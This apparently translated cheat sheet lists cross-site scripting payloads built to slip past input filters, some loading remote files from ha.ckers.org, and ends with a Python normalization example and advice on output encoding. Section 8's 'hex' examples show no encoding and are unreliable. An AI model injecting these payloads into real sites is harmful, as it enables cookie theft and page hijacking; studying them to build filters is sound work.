1. Change the case of characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another file extension in place of .js

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in a SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie through META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
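As an added example that is not part of the original post: the Python below shows, from the filter's side, why the case, tab/newline, backslash, CSS-comment and entity tricks from sections 1, 6, 7 and 8 slip past a literal substring blacklist, and how a normalization pass (for detection only) lets the same rule flag them. The samples are constructed from the page's own vectors; the `&#x6A;` entity form is an assumption standing in for section 8, whose encoded text is not preserved in this copy.

```python
import html
import re

# Constructed samples reproducing the payload shapes from the sections
# above (section number in the comment). The &#x6A; entity form is an
# assumed stand-in for section 8's hex-encoded variant.
SAMPLES = [
    "<sCript>alert('d')</scRipT>",                              # 1  case
    "<img src=\"jav\tascr\tipt:alert('XSS3')\">",               # 6  tab
    "<img src=\"jav\nascr\nipt:alert('XSS3')\">",               # 6  newline
    "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",    # 7  backslash
    "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",  # 7  CSS comment
    "<IMG SRC=\"&#x6A;avascript:alert('XSS')\">",               # 8  hex entity
    "<IFRAME SRC=javascript:alert('13')></IFRAME>",             # 14 plain
]

# A first-cut blacklist: case-sensitive, contiguous substrings only.
NAIVE = re.compile(r"<script|javascript:|expression\(")


def naive_hits(s: str) -> bool:
    """What a literal substring filter sees in the raw input."""
    return NAIVE.search(s) is not None


def normalize(s: str) -> str:
    """Undo the evasions listed on this page. Detection aid only, not a sanitizer."""
    s = html.unescape(s)                          # &#x6A; -> j            (8)
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)   # drop CSS comments      (7)
    s = s.replace("\\", "")                       # expre\ssi\on -> expression (7)
    s = re.sub(r"[\t\n\r\x00]", "", s)            # jav<TAB>ascript        (6)
    return s.lower()                              # <sCript> -> <script>   (1)


def normalized_hits(s: str) -> bool:
    """Same blacklist rule, applied after normalization."""
    return NAIVE.search(normalize(s)) is not None


def evaded_naive_filter() -> list:
    """Samples the literal blacklist misses but the normalized check flags."""
    return [s for s in SAMPLES if not naive_hits(s) and normalized_hits(s)]


if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_hits(s)!s:5} normalized={normalized_hits(s)!s:5} {s!r}")
```

Normalization narrows the gap but any blacklist stays bypassable; the mitigation that actually closes these vectors is contextual output encoding or an allow-list HTML sanitizer at the sink.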